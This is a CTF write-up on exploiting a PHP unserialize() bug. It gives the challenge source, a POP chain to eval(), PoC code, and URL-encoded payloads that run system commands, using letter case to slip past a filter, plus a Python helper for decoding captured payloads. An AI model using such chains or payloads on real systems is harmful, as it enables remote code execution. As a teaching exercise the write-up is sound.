Preface
While solving challenges in a competition I ran into a problem that looks a lot like NISACTF2022 babyserialize, so I'm writing it up here.
Challenge
<?php
include "waf.php";
class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }
    function __call($from,$val){
        $this->fun=$val[0];
    }
    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}
class love{
    public $ext;
    public $x;
    public function __wakeup(){
        die("Maybe it failed?");
    }
    public function __destruct(){
        $this->ext->ZZU_ctf_is_fun($this->x);
    }
}
class Ilovectf{
    public $huang;
    public $su;
    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }
    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}
class four{
    public $a="please_don't_copy";
    private $fun='abc';
    public function __set($name, $value)
    {
        $this->$name=$value;
        if($this->fun=md5($this->fun)){
            strtoupper($this->a);
        }
    }
}
if(isset($_GET['unser'])){
    @unserialize($_GET['unser']);
}else{
    highlight_file(__FILE__);
}
?>
This is PHP deserialization, so the obvious goal is to build a POP chain that reaches eval(), with the argument being the command we want to run.
POP chain
love::__destruct -> Ilovectf::__call -> four::__set -> Ilovectf::__toString -> CTF::__invoke
PoC
<?php
class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
}
class love{
    public $ext;
    public $x;
}
class Ilovectf{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun;
}
$ct = new CTF();
$ct->txw4ever = "sYstem('ls /');"; # PHP function names are case-insensitive, which gets past the filter
$b = new love();
$att = new Ilovectf();
$b->ext = $att;
$b->x = "1e3"; # anything whose md5 is non-zero works
$c = new four();
$att->huang = $c;
$c->a = $att;
$att->su = $ct;
echo urlencode(serialize($b));
?>
Oddly, love::__wakeup was not triggered after sending the parameter (it clearly did trigger on my own server... can anyone who knows explain this?)
Payload
?unser=O%3A4%3A%22love%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovectf%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A3%3A%22CTF%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A13%3A%22sYstem%28%27ls%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3Bs%3A3%3A%221e3%22%3B%7D
Result:
Change the command to sYstem('cat /fllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6')
The payload is then:
?unser=O%3A4%3A"love"%3A2%3A%7Bs%3A3%3A"ext"%3BO%3A8%3A"Ilovectf"%3A2%3A%7Bs%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A%7Bs%3A1%3A"a"%3Br%3A2%3Bs%3A9%3A"%00four%00fun"%3BN%3B%7Ds%3A2%3A"su"%3BO%3A3%3A"CTF"%3A2%3A%7Bs%3A3%3A"fun"%3Bs%3A12%3A"show_me_flag"%3Bs%3A8%3A"txw4ever"%3Bs%3A64%3A"sYstem%28%27cat+%2Ffllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6%27%29%3B"%3B%7D%7Ds%3A1%3A"x"%3Bs%3A3%3A"1e3"%3B%7D
which gives flag{It_is_tmd_easy_php_orz}
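The percent-encoded payloads above are hard to read, so here is a small Python helper, added as an example and not part of the original writeup, that decodes a captured ?unser= value and walks the PHP serialize() format: it lists the classes the payload would instantiate, undoes the %00four%00fun private-property name mangling, and surfaces the r:2 back-reference (the second value in serialization order, i.e. the Ilovectf object). The names load, parse, classes and demangle are chosen here; the sample input is the post's first payload.

```python
from urllib.parse import unquote
# The writeup's first payload, exactly as it arrives in ?unser= (test input copied from the post above).
PAYLOAD = (
    "O%3A4%3A%22love%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovectf%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22"
    "%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A3%3A%22CTF%22%3A2%3A%7B"
    "s%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A13%3A%22sYstem%28%27ls%27%29%3B%22%3B%7D%7D"
    "s%3A1%3A%22x%22%3Bs%3A3%3A%221e3%22%3B%7D"
)

def demangle(name):
    """Undo PHP name mangling: '\\0four\\0fun' -> 'private four::fun', '\\0*\\0x' -> 'protected x'."""
    _, scope, prop = name.split('\0', 2) if name.startswith('\0') else ('', None, name)
    return prop if scope is None else f'protected {prop}' if scope == '*' else f'private {scope}::{prop}'

def parse(s, i=0):
    """Parse one value at s[i] -> (value, index after it). Objects are dicts with '__class'; r:n -> ('ref', n)."""
    t = s[i]
    if t in 'NibdrR':                           # N;  i:1;  d:1.5;  b:1;  r:2;   (b/d kept as raw text)
        end = s.index(';', i)
        raw = s[i + 2:end]                      # '' for N
        return (None if t == 'N' else ('ref', int(raw)) if t in 'rR'
                else int(raw) if t == 'i' else raw), end + 1
    if t == 's':                                # s:<byte length>:"<text>";
        colon = s.index(':', i + 2)
        n, start = int(s[i + 2:colon]), colon + 2
        return s[start:start + n], start + n + 2    # skip closing quote and ';'
    if t in 'aO':                               # a:<count>:{k;v;...}  O:<len>:"<class>":<count>:{k;v;...}
        out, j = {}, i + 2
        if t == 'O':
            colon = s.index(':', j)
            n = int(s[j:colon])
            out['__class'], j = s[colon + 2:colon + 2 + n], colon + n + 4   # past closing quote and ':'
        colon = s.index(':', j)
        count, j = int(s[j:colon]), colon + 2       # past ':' and '{'
        for _ in range(count):
            k, j = parse(s, j)
            v, j = parse(s, j)
            out[demangle(k) if t == 'O' else k] = v
        return out, j + 1                           # past '}'
    raise ValueError(f'unsupported token {t!r} at offset {i}')

def classes(value):
    """Every class the payload would instantiate, outermost first (depth-first)."""
    return [] if not isinstance(value, dict) else ([value['__class']] if '__class' in value else []) + [c for v in value.values() for c in classes(v)]

def load(query_value):
    """URL-decode a ?unser= value and parse it; latin-1 keeps one byte per character, matching PHP's byte-based lengths."""
    return parse(unquote(query_value, encoding='latin-1'))[0]
```

When triaging a captured request, compare the class list against what the endpoint legitimately needs to deserialize; unserialize()'s allowed_classes option (PHP 7+) is where that allow-list is enforced.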
Closing thoughts
I think this challenge mainly tests understanding of PHP magic methods and language quirks (I never thought of using letter case to bypass the filter, kept swapping functions around... I'm bad at this, lol).